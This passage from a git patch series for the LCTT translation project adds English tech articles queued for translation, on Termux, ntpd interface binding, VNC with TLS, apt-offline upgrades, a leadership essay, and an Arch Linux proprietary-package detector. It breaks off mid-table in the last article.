+ * Puzznic! S.11 - Stage 11 from Puzznic with 10 levels
+ * Puzznic! S.12 - Stage 12 from Puzznic with 10 levels
+ * Puzznic! S.13 - Stage 13 from Puzznic with 10 levels
+ * Puzznic! S.14 - Stage 14 from Puzznic with 10 levels
+
+
+
+### Command-Line Options
+
+![Wizznic Command Options][3]
+
+By default OpenGL is enabled, but it can be disabled. There are options to play the game in full screen mode, or scale to a 640×480 window. There's also Oculus Rift support, and the ability to dump screenshots of the levels.
+
+**Supported OS:** Linux and Windows (there is no macOS build). Besides Linux and Windows, there are official binaries available for Pandora, GP2X Wiz, and GCW-Zero. There are also unofficial ports available for Android, Debian, Ubuntu, Gentoo, FreeBSD, Haiku, Amiga OS4, Canoo, Dingux, Motorola ZN5, U9, E8, EM30, VE66, EM35, and PlayStation Portable.
+
+Homepage: **[wizznic.org][6]**
+Developer: Jimmy Christensen (Programming, Graphics, Sound Direction), ViperMD (Graphics)
+License: GNU GPL v3
+Written in: **[C][7]**
+
+
+**Footnote**
+
+The game's audio is much better than it sounds in the video. I probably should have tried the recording facility available from the command line (see the command-line options above); instead I used vokoscreen to make the video.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ossblog.org/wizznic-highly-addictive-open-source-puzzle-game/
+
+作者:[Steve Emms][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ossblog.org/author/steve/
+[1]:https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/10/Wizznic-Level4.png?resize=640%2C510&ssl=1
+[2]:https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/10/Wizznic-Editor.png?resize=640%2C510&ssl=1
+[3]:https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/10/Wizznic-CommandOptions.png?resize=800%2C397&ssl=1
+[4]:https://i1.wp.com/www.ossblog.org/wp-content/uploads/2017/01/linux.png?resize=48%2C48&ssl=1
+[5]:https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/01/tick.png?resize=49%2C48&ssl=1
+[6]:http://wizznic.org/
+[7]:https://www.ossblog.org/c-programming-language-profile/
+[8]:https://i2.wp.com/www.ossblog.org/wp-content/uploads/2017/01/windows.png?resize=48%2C48&ssl=1
+[9]:https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/01/apple_green.png?resize=48%2C48&ssl=1
+[10]:https://i1.wp.com/www.ossblog.org/wp-content/uploads/2017/01/cross.png?resize=48%2C48&ssl=1
From 88f3f86933c8028dca643187ef8fa023112a4baa Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:08:58 +0800
Subject: [PATCH 037/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Run=20Linux=20On?=
=?UTF-8?q?=20Android=20Devices,=20No=20Rooting=20Required!?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...On Android Devices, No Rooting Required.md | 68 +++++++++++++++++++
1 file changed, 68 insertions(+)
create mode 100644 sources/tech/20171024 Run Linux On Android Devices, No Rooting Required.md
diff --git a/sources/tech/20171024 Run Linux On Android Devices, No Rooting Required.md b/sources/tech/20171024 Run Linux On Android Devices, No Rooting Required.md
new file mode 100644
index 0000000000..e93ea4638a
--- /dev/null
+++ b/sources/tech/20171024 Run Linux On Android Devices, No Rooting Required.md
@@ -0,0 +1,68 @@
+translating by lujun9972
+Run Linux On Android Devices, No Rooting Required!
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Termux-720x340.jpg)
+
+The other day I was searching for a simple and easy way to run Linux on Android. My only intention was to use Linux with some basic applications like SSH, Git, awk etc. Not much! I didn't want to root the Android device. I have a tablet PC that I mostly use for reading ebooks, news, and a few Linux blogs. I don't use it much for other activities, so I decided to use it for some Linux activities. After spending a few minutes on the Google Play Store, one app immediately caught my attention and I wanted to give it a try. If you've ever wondered how to run Linux on Android devices, this one might help.
+
+### Termux - An Android terminal emulator to run Linux on Android and Chrome OS
+
+**Termux** is an Android terminal emulator and Linux environment app. Unlike many other apps, you don't need to root your device, and no setup is required. It just works out of the box! A minimal base Linux system is installed automatically, and of course you can install other packages with the APT package manager. In short, you can use your Android device like a pocket Linux computer. It's not just for Android; you can install it on Chrome OS too.
+
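+Once installed, package management works much like it does on a Debian-style system. Here is a quick, hedged sketch; the package names below are just common examples, not anything prescribed by Termux, and the SSH daemon's listening port is Termux-specific, so check its docs:
+```
+# Refresh the package lists and install a few common tools
+apt update
+apt install git openssh python
+
+# Start the SSH daemon so you can log in from another machine
+sshd
+```
+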
+Termux offers many more significant features than you might think.
+
+ * It allows you to SSH into your remote server via OpenSSH.
+ * You can also SSH into your Android device from any remote system.
+ * Sync your smartphone contacts to a remote system using rsync and curl.
+ * You can choose from shells such as Bash, Zsh, and Fish.
+ * You can choose different text editors such as Emacs, Nano, and Vim to edit/view files.
+ * Install any packages of your choice on your Android device using the APT package manager. Up-to-date versions of Git, Perl, Python, Ruby and Node.js are all available.
+ * Connect your Android device to a Bluetooth keyboard, mouse and external display and use it like a convergence device. Termux supports keyboard shortcuts.
+ * Termux allows you to run almost all GNU/Linux commands.
+
+
+
+It also has some extra features. You can enable them by installing the addons. For instance, the **Termux:API** addon will allow you to access Android and Chrome hardware features. The other useful addons are:
+
+ * Termux:Boot - Run script(s) when your device boots.
+ * Termux:Float - Run Termux in a floating window.
+ * Termux:Styling - Provides color schemes and powerline-ready fonts to customize the appearance of the Termux terminal.
+ * Termux:Task - Provides an easy way to call Termux executables from Tasker and compatible apps.
+ * Termux:Widget - Provides an easy way to start small scriptlets from the home screen.
+
+
+
+To know more about Termux, open the built-in help section by long-pressing anywhere on the terminal and selecting the Help menu option. The only drawback is that it **requires Android 5.0 and higher versions**. It could be more useful for many users if it supported Android 4.x and older versions. Termux is available in the **Google Play Store** and on **F-Droid**.
+
+To install Termux from Google Play Store, click the following button.
+
+[![termux][1]][2]
+
+To install it from F-Droid, click the following button.
+
+[![][1]][3]
+
+You now know how to try Linux on your Android devices using Termux. Do you use any other apps worth trying? Please mention them in the comment section below. I'd love to try them too!
+
+Cheers!
+
+Resource:
+
+[Termux website][4]
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/termux-run-linux-android-devices-no-rooting-required/
+
+作者:[SK][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[2]:https://play.google.com/store/apps/details?id=com.termux
+[3]:https://f-droid.org/packages/com.termux/
+[4]:https://termux.com/
From 9cb97082afa2f3af939b2476d1d943634de6e74f Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:16:27 +0800
Subject: [PATCH 038/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20bind?=
=?UTF-8?q?=20ntpd=20to=20specific=20IP=20addresses=20on=20Linux/Unix?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... to specific IP addresses on Linux-Unix.md | 94 +++++++++++++++++++
1 file changed, 94 insertions(+)
create mode 100644 sources/tech/20171030 How to bind ntpd to specific IP addresses on Linux-Unix.md
diff --git a/sources/tech/20171030 How to bind ntpd to specific IP addresses on Linux-Unix.md b/sources/tech/20171030 How to bind ntpd to specific IP addresses on Linux-Unix.md
new file mode 100644
index 0000000000..be091e91a2
--- /dev/null
+++ b/sources/tech/20171030 How to bind ntpd to specific IP addresses on Linux-Unix.md
@@ -0,0 +1,94 @@
+How to bind ntpd to specific IP addresses on Linux/Unix
+======
+By default, my ntpd/NTP server listens on all interfaces and IP addresses, i.e. 0.0.0.0:123. How do I make sure ntpd only listens on a specific IP address, such as localhost or 192.168.1.1:123, on a Linux or FreeBSD Unix server?
+
+NTP is an acronym for Network Time Protocol. It is used for clock synchronization between computers. The ntpd program is an operating system daemon which sets and maintains the system time of day in synchronism with Internet standard time servers.
+[![How to prevent NTPD from listening on 0.0.0.0:123 and binding to specific IP addresses on a Linux/Unix server][1]][1]
+NTP is configured using the ntp.conf file located in the /etc/ directory.
+
+## interface directive in /etc/ntp.conf
+
+
+You can prevent ntpd from listening on 0.0.0.0:123 by using the interface directive. The syntax is:
+`interface listen IPv4|IPv6|all
+interface ignore IPv4|IPv6|all
+interface drop IPv4|IPv6|all`
+The above directives configure which network addresses ntpd listens on, ignores, or drops without processing any requests. The ignore option prevents opening the matching addresses; drop causes ntpd to open the address but drop all received packets without examination. For example, to ignore listening on all interfaces, add the following to /etc/ntp.conf:
+`interface ignore wildcard`
+To listen to only 127.0.0.1 and 192.168.1.1 addresses:
+`interface listen 127.0.0.1
+interface listen 192.168.1.1`
+Here is my sample /etc/ntp.conf file from FreeBSD cloud server:
+`$ egrep -v '^#|^$' /etc/ntp.conf`
+Sample outputs:
+```
+tos minclock 3 maxclock 6
+pool 0.freebsd.pool.ntp.org iburst
+restrict default limited kod nomodify notrap noquery nopeer
+restrict -6 default limited kod nomodify notrap noquery nopeer
+restrict source limited kod nomodify notrap noquery
+restrict 127.0.0.1
+restrict -6 ::1
+leapfile "/var/db/ntpd.leap-seconds.list"
+interface ignore wildcard
+interface listen 172.16.3.1
+interface listen 10.105.28.1
+```
+
+
+## Restart ntpd
+
+Reload/restart the ntpd on a FreeBSD unix:
+`$ sudo /etc/rc.d/ntpd restart`
+OR [use the following command on a Debian/Ubuntu Linux][2]:
+`$ sudo systemctl restart ntp`
+OR [use the following on a CentOS/RHEL 7/Fedora Linux][2]:
+`$ sudo systemctl restart ntpd`
+
+## Verification
+
+Use the netstat or ss command to verify that ntpd binds only to the specific IP addresses:
+`$ netstat -tulpn | grep :123`
+OR
+`$ ss -tulpn | grep :123`
+Sample outputs:
+```
+udp 0 0 10.105.28.1:123 0.0.0.0:* -
+udp 0 0 172.16.3.1:123 0.0.0.0:* -
+```
+
+
+Use [the sockstat command on a FreeBSD Unix server][3]:
+`$ sudo sockstat
+$ sudo sockstat -4
+$ sudo sockstat -4 | grep :123`
+Sample outputs:
+```
+root ntpd 59914 22 udp4 127.0.0.1:123 *:*
+root ntpd 59914 24 udp4 127.0.1.1:123 *:*
+```
+
+
+## Posted by: Vivek Gite
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][4], [Facebook][5], [Google+][6].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/how-to-bind-ntpd-to-specific-ip-addresses-on-linuxunix/
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/media/new/faq/2017/10/how-to-prevent-ntpd-to-listen-on-all-interfaces-on-linux-unix-box.jpg
+[2]:https://www.cyberciti.biz/faq/restarting-ntp-service-on-linux/
+[3]:https://www.cyberciti.biz/faq/freebsd-unix-find-the-process-pid-listening-on-a-certain-port-commands/
+[4]:https://twitter.com/nixcraft
+[5]:https://facebook.com/nixcraft
+[6]:https://plus.google.com/+CybercitiBiz
From a99a0f10ffdee7d0f57da467619877253975d4d4 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:36:56 +0800
Subject: [PATCH 039/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Easy=20guide=20to?=
=?UTF-8?q?=20secure=20VNC=20server=20with=20TLS=20encryption?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...o secure VNC server with TLS encryption.md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 sources/tech/20171027 Easy guide to secure VNC server with TLS encryption.md
diff --git a/sources/tech/20171027 Easy guide to secure VNC server with TLS encryption.md b/sources/tech/20171027 Easy guide to secure VNC server with TLS encryption.md
new file mode 100644
index 0000000000..189e57535f
--- /dev/null
+++ b/sources/tech/20171027 Easy guide to secure VNC server with TLS encryption.md
@@ -0,0 +1,135 @@
+Easy guide to secure VNC server with TLS encryption
+======
+In this tutorial, we will learn to install VNC server & secure VNC server sessions with TLS encryption.
+This method has been tested on CentOS 6 & 7 but should work on other versions/OS as well (RHEL, Scientific Linux etc).
+
+**(Recommended Read:[Ultimate guide for Securing SSH sessions][1] )**
+
+### Installing VNC server
+
+Before we install VNC server on our machines, make sure we have a working GUI. If a GUI is not installed on our machine, we can install it by executing the following command,
+
+```
+yum groupinstall "GNOME Desktop"
+```
+
+Now we will use TigerVNC as our VNC server; to install it, run,
+
+```
+# yum install tigervnc-server
+```
+
+Once VNC server has been installed, we will create a new user to access the server,
+
+```
+# useradd vncuser
+```
+
+& assign it a password for accessing VNC by using the following command,
+
+```
+# vncpasswd vncuser
+```
+
+The configuration differs a little between CentOS 6 & 7, so we will first address the CentOS 6 configuration,
+
+#### CentOS 6
+
+Now we need to edit VNC configuration file,
+
+```
+# vim /etc/sysconfig/vncservers
+```
+
+& add the following lines,
+
+```
+[...]
+VNCSERVERS="1:vncuser"
+VNCSERVERARGS[1]="-geometry 1024x768"
+```
+
+Save the file & exit. Next restart the vnc service to implement the changes,
+
+```
+# service vncserver restart
+```
+
+& enable it at boot,
+
+```
+# chkconfig vncserver on
+```
+
+#### CentOS 7
+
+On CentOS 7, the /etc/sysconfig/vncservers file has been replaced by /lib/systemd/system/vncserver@.service. We will use this file as a reference, so create a copy of it,
+
+```
+# cp /lib/systemd/system/vncserver@.service /etc/systemd/system/vncserver@:1.service
+```
+
+Next we will edit the file to include our created user,
+
+```
+# vim /etc/systemd/system/vncserver@:1.service
+```
+
+& edit the user on the following 2 lines,
+
+```
+ExecStart=/sbin/runuser -l vncuser -c "/usr/bin/vncserver %i"
+PIDFile=/home/vncuser/.vnc/%H%i.pid
+```
+
+Save file & exit. Next restart the service & enable it at boot,
+
+```
+systemctl restart vncserver@:1.service
+systemctl enable vncserver@:1.service
+```
+
+We now have our VNC server ready & can connect to it from a client machine using the IP address of the VNC server. But before we do that, we will secure our connections with TLS encryption.
+
+### Securing the VNC session
+
+To secure VNC server sessions, we will first configure the encryption method. We will be using TLS encryption, but SSL encryption can also be used. Execute the following command to start using TLS encryption on the VNC server,
+
+```
+# vncserver -SecurityTypes=VeNCrypt,TLSVnc
+```
+
+You will be asked to enter a password to access VNC (if using any user other than the above-mentioned user),
+
+![secure vnc server][4]
+
+We can now access the server using the VNC viewer from the client machine, use the following command to start vnc viewer with secure connection,
+
+```
+# vncviewer -SecurityTypes=VeNCrypt,TLSVnc 192.168.1.45:1
+```
+
+Here, 192.168.1.45 is the IP address of the VNC server.
+
+![secure vnc server][6]
+
+Enter the password & we can then access the server remotely, with TLS encryption.
+
+This completes our tutorial; feel free to send your suggestions or queries using the comment box below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/secure-vnc-server-tls-encryption/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/ultimate-guide-to-securing-ssh-sessions/
+[2]:/cdn-cgi/l/email-protection
+[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=642%2C241
+[4]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/secure_vnc-1.png?resize=642%2C241
+[5]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=665%2C419
+[6]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/10/secure_vnc-2.png?resize=665%2C419
From 6af2cfebb7b7de1e3c6cf65626987d011c1ea9aa Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:38:57 +0800
Subject: [PATCH 040/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Fully?=
=?UTF-8?q?=20Update=20And=20Upgrade=20Offline=20Debian-based=20Systems?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Upgrade Offline Debian-based Systems.md | 125 ++++++++++++++++++
1 file changed, 125 insertions(+)
create mode 100644 sources/tech/20171103 How To Fully Update And Upgrade Offline Debian-based Systems.md
diff --git a/sources/tech/20171103 How To Fully Update And Upgrade Offline Debian-based Systems.md b/sources/tech/20171103 How To Fully Update And Upgrade Offline Debian-based Systems.md
new file mode 100644
index 0000000000..a0fb133043
--- /dev/null
+++ b/sources/tech/20171103 How To Fully Update And Upgrade Offline Debian-based Systems.md
@@ -0,0 +1,125 @@
+How To Fully Update And Upgrade Offline Debian-based Systems
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/11/Upgrade-Offline-Debian-based-Systems-2-720x340.png)
+
+A while ago we showed you how to install software on any [**offline Ubuntu**][1] system and any [**offline Arch Linux**][2] system. Today, we will see how to fully update and upgrade offline Debian-based systems. Unlike the previous methods, we do not update/upgrade a single package, but the whole system. This method can be helpful when you don't have an active Internet connection, or only a slow one.
+
+### Fully Update And Upgrade Offline Debian-based Systems
+
+Let us say you have a system (Windows or Linux) with a high-speed Internet connection at work and a Debian or Debian-derived system with no Internet connection, or a very slow one (like dial-up), at home. You want to upgrade your offline home system. What would you do? Buy a high-speed Internet connection? Not necessary! You can still update or upgrade your offline system without connecting it to the Internet. This is where **Apt-Offline** comes in handy.
+
+As the name says, apt-offline is an offline APT package manager for APT-based systems like Debian and Debian-derived distributions such as Ubuntu and Linux Mint. Using apt-offline, we can fully update/upgrade our Debian box without connecting it to the Internet. It is a cross-platform tool written in Python and has both CLI and graphical interfaces.
+
+#### Requirements
+
+ * An Internet-connected system (Windows or Linux). We call it the online system throughout this guide for the sake of clarity.
+ * An offline system (Debian or a Debian-derived system). We call it the offline system.
+ * A USB drive or external hard drive with sufficient space to carry all updated packages.
+
+
+
+#### Installation
+
+Apt-Offline is available in the default repositories of Debian and its derivatives. If your online system is running Debian, Ubuntu, Linux Mint, or another DEB-based system, you can install Apt-Offline using the command:
+```
+sudo apt-get install apt-offline
+```
+
+If your online system runs any distro other than Debian and its derivatives, git clone the Apt-Offline repository:
+```
+git clone https://github.com/rickysarraf/apt-offline.git
+```
+
+Go to the directory and run it from there.
+```
+cd apt-offline/
+```
+```
+sudo ./apt-offline
+```
+
+#### Steps to do in Offline system (Non-Internet connected system)
+
+Go to your offline system and create a directory where you want to store the signature file:
+```
+mkdir ~/tmp
+```
+```
+cd ~/tmp/
+```
+
+You can use any directory of your choice. Then, run the following command to generate the signature file:
+```
+sudo apt-offline set apt-offline.sig
+```
+
+Sample output would be:
+```
+Generating database of files that are needed for an update.
+
+Generating database of file that are needed for operation upgrade
+```
+
+By default, apt-offline will generate a database of the files needed for both update and upgrade. You can use the `--update` or `--upgrade` option to create a database for only one of these operations.
+
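+For example, to generate a signature file that covers only the upgrade operation, the call would look something like this (a sketch of the same `apt-offline set` command shown above, just with the extra option):
+```
+# Record only what is needed for an upgrade
+sudo apt-offline set ~/tmp/apt-offline.sig --upgrade
+```
+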
+Copy the entire **tmp** folder to a USB drive or external drive and go to your online system (the Internet-enabled system).
+
+#### Steps to do in Online system
+
+Plug in your USB drive and go to the temp directory:
+```
+cd tmp/
+```
+
+Then, run the following command:
+```
+sudo apt-offline get apt-offline.sig --threads 5 --bundle apt-offline-bundle.zip
+```
+
+Here, "-threads 5" represents the number of APT repositories. You can increase the number if you want to download packages from more repositories. And, "-bundle apt-offline-bundle.zip" option represents all packages will be bundled in a single archive file called **apt-offline-bundle.zip**. This archive file will be saved in your current working directory.
+
+The above command will download data based on the signature file generated earlier in the offline system.
+
+[![][3]][4]
+
+This will take several minutes depending upon the Internet connection speed. Please note that apt-offline is cross platform, so you can use it to download packages on any OS.
+
+Once completed, copy the **tmp** folder to the USB or external drive and return to the offline system. Make sure your USB device has enough free space to hold all the downloaded files, because all packages are now in the tmp folder.
+
+#### Steps to do in offline system
+
+Plug in the device in your offline system and go to the **tmp** directory where you have downloaded all packages earlier.
+```
+cd tmp
+```
+
+Then, run the following command to install all the downloaded packages.
+```
+sudo apt-offline install apt-offline-bundle.zip
+```
+
+This will update the APT database, so APT will find all required packages in the APT cache.
+
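+Once the database is updated, the usual APT commands can be run against the now-populated local cache. A hedged sketch of the final step (plain apt-get; nothing here is specific to apt-offline):
+```
+# Apply the upgrades using the packages apt-offline placed in the local APT cache
+sudo apt-get upgrade
+```
+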
+**Note:** If both online and offline systems are in the same local network, you can transfer the **tmp** folder to the offline system using "scp" or any other file transfer applications. If both systems are in different places, copy the folder using USB devices.
+
+And, that's all for now, folks. I hope this guide is useful for you. More good stuff to come. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/fully-update-upgrade-offline-debian-based-systems/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/install-softwares-offline-ubuntu-16-04/
+[2]:https://www.ostechnix.com/install-packages-offline-arch-linux/
+[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/apt-offline.png ()
From 3fd35032706b17db4c0ff6a874577184316cf732 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:41:50 +0800
Subject: [PATCH 041/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20allowing=20?=
=?UTF-8?q?myself=20to=20be=20vulnerable=20made=20me=20a=20better=20leader?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...o be vulnerable made me a better leader.md | 64 +++++++++++++++++++
1 file changed, 64 insertions(+)
create mode 100644 sources/tech/20180104 How allowing myself to be vulnerable made me a better leader.md
diff --git a/sources/tech/20180104 How allowing myself to be vulnerable made me a better leader.md b/sources/tech/20180104 How allowing myself to be vulnerable made me a better leader.md
new file mode 100644
index 0000000000..1cd6a22162
--- /dev/null
+++ b/sources/tech/20180104 How allowing myself to be vulnerable made me a better leader.md
@@ -0,0 +1,64 @@
+How allowing myself to be vulnerable made me a better leader
+======
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/leaderscatalysts.jpg?itok=f8CwHiKm)
+
+Conventional wisdom suggests that leadership is strong, bold, decisive. In my experience, leadership does feel like that some days.
+
+Some days leadership feels more vulnerable. Doubts creep in: Am I making good decisions? Am I the right person for this job? Am I focusing on the most important things?
+
+The trick with these moments is to talk about these moments. When we keep them secret, our insecurity only grows. Being an open leader means pushing our vulnerability into the spotlight. Only then can we seek comfort from others who have experienced similar moments.
+
+To demonstrate how this works, I'll share a story.
+
+### A nagging question
+
+If you work in the tech industry, you'll note an obvious focus on creating [an organization that's inclusive][1]--a place for diversity to flourish. Long story short: I thought I was a "diversity hire," someone hired because of my gender, not my ability. Even after more than 15 years in the industry, with all of the focus on diversity in hiring, that possibility got under my skin. Along came the doubts: Was I hired because I was the best person for the job--or because I was a woman? After years of knowing I was hired because I was the best person, the fact that I was female suddenly seemed like it was more interesting to potential employers.
+
+I rationalized that it didn't matter why I was hired; I knew I was the best person for the job and would prove it. I worked hard, delivered results, made mistakes, learned, and did everything an employer would want from an employee.
+
+And yet the "diversity hire" question nagged. I couldn't shake it. I avoided the subject like the plague and realized that not talking about it was a signal that I had no choice but to deal with it. If I continued to avoid the subject, it was going to affect my work. And that's the last thing I wanted.
+
+### Speaking up
+
+Talking about diversity and inclusion can be awkward. So many factors enter into the decision to open up:
+
+ * Can we trust our co-workers with a vulnerable moment?
+ * Can a leader of a team be too vulnerable?
+ * What if I overstep? Do I damage my career?
+
+
+
+In my case, I ended up at a lunch Q&A session with an executive who's a leader in many areas of the organization--especially candid conversations. A coworker asked the "Was I a diversity hire?" question. He stopped and spent a significant amount of time talking about this question to a room full of women. I'm not going to recount the entire discussion here; I will share the most salient point: If you know you're qualified for the job and you know the interview went well, don't doubt the outcome. Anyone who questions whether you're a diversity hire has their own questions to answer. You don't have to go on their journey.
+
+Mic drop.
+
+I wish I could say that I stopped thinking about this topic. I didn't. The question lingered: What if I am the exception to the rule? What if I was the one diversity hire? I realized that I couldn't avoid the nagging question.
+
+Because I had the courage to be vulnerable--to go there with my question--I had the burden of my secret question lifted.
+
+A few weeks later I had a one-on-one with the executive. At the end of the conversation, I mentioned that, as a woman, I appreciate his candid conversations about diversity and inclusion. It's easier to talk about these topics when a recognized leader is willing to have the conversation. I also returned to the "Was I a diversity hire?" question. He didn't hesitate: We talked. At the end of the conversation, I realized that I was hungry to talk about these things that require bravery; I only needed a nudge and someone who cared enough to talk and listen.
+
+Because I had the courage to be vulnerable--to go there with my question--I had the burden of my secret question lifted. Feeling physically lighter, I started to have constructive conversations around the questions of implicit bias, what we can do to be inclusive, and what diversity looks like. As I've learned, every person has a different answer when I ask the diversity question. I wouldn't have gotten to have all of these amazing conversations if I'd stayed stuck with my secret.
+
+I had courage to talk, and I hope you will too.
+
+Let's talk about these things that hold us back in terms of our ability to lead so we can be more open leaders in every sense of the phrase. Has allowing yourself to be vulnerable made you a better leader?
+
+### About The Author
+
+Angela Robertson works as a senior manager at Microsoft. She works with an amazing team of people passionate about community contributions and engaged in open organizations. Before joining Microsoft, Angela worked at Red Hat.
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/12/how-allowing-myself-be-vulnerable-made-me-better-leader
+
+作者:[Angela Robertson][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/arobertson98
+[1]:https://opensource.com/open-organization/17/9/building-for-inclusivity
From 4b5083231da83b2628e7a184312b3ba609b6aaf0 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 09:43:55 +0800
Subject: [PATCH 042/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Find?=
=?UTF-8?q?=20The=20Installed=20Proprietary=20Packages=20In=20Arch=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...lled Proprietary Packages In Arch Linux.md | 120 ++++++++++++++++++
1 file changed, 120 insertions(+)
create mode 100644 sources/tech/20180103 How To Find The Installed Proprietary Packages In Arch Linux.md
diff --git a/sources/tech/20180103 How To Find The Installed Proprietary Packages In Arch Linux.md b/sources/tech/20180103 How To Find The Installed Proprietary Packages In Arch Linux.md
new file mode 100644
index 0000000000..69b523426c
--- /dev/null
+++ b/sources/tech/20180103 How To Find The Installed Proprietary Packages In Arch Linux.md
@@ -0,0 +1,120 @@
+How To Find The Installed Proprietary Packages In Arch Linux
+======
+![](https://www.ostechnix.com/wp-content/uploads/2018/01/Absolutely-Proprietary-720x340.jpg)
+Are you an avid free software supporter currently using an Arch-based distribution? I've got a small tip for you! Now, you can easily find the installed proprietary packages in Arch Linux and its variants such as Antergos, Manjaro Linux etc. You don't need to refer to the license details of each installed package on its website or use any external tool to find out whether a package is free or proprietary.
+
+### Find The Installed Proprietary Packages In Arch Linux
+
+A fellow developer has created a utility named **"Absolutely Proprietary"**, a proprietary package detector for Arch-based distributions. It compares all installed packages in your Arch-based system against Parabola's package [blacklist][1] and [aur-blacklist][2] and then prints your **Stallman Freedom Index** (free/total). Additionally, you can save the list to a file and share or compare it with other systems/users.
+
+Before installing it, make sure you have installed **python** and **git**.
+
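+On an Arch-based system, both can be installed with pacman. A minimal sketch, assuming the standard repository package names:
+```
+sudo pacman -S --needed python git
+```
+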
+Then, git clone the repository:
+```
+git clone https://github.com/vmavromatis/absolutely-proprietary.git
+```
+
+This command will download all the contents into a directory called 'absolutely-proprietary' in your current working directory.
+
+Change to that directory:
+```
+cd absolutely-proprietary
+```
+
+And, find the installed proprietary packages using command:
+```
+python main.py
+```
+
+This command will download blacklist.txt and aur-blacklist.txt, compare the locally installed packages against the remote blacklists, and display the results.
+
+Here is the sample output from my Arch Linux desktop:
+```
+Retrieving local packages (including AUR)...
+Downloading https://git.parabola.nu/blacklist.git/plain/blacklist.txt
+Downloading https://git.parabola.nu/blacklist.git/plain/aur-blacklist.txt
+Comparing local packages to remote...
+=============================================
+47 ABSOLUTELY PROPRIETARY PACKAGES INSTALLED
+=============================================
+
+Your GNU/Linux is infected with 47 proprietary packages out of 1370 total installed.
+Your Stallman Freedom Index is 96.57
+
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
+| Name | Status | Libre Alternatives | Description |
++------------------------|---------|--------------------|---------------------------------------------------------------------------------------------+
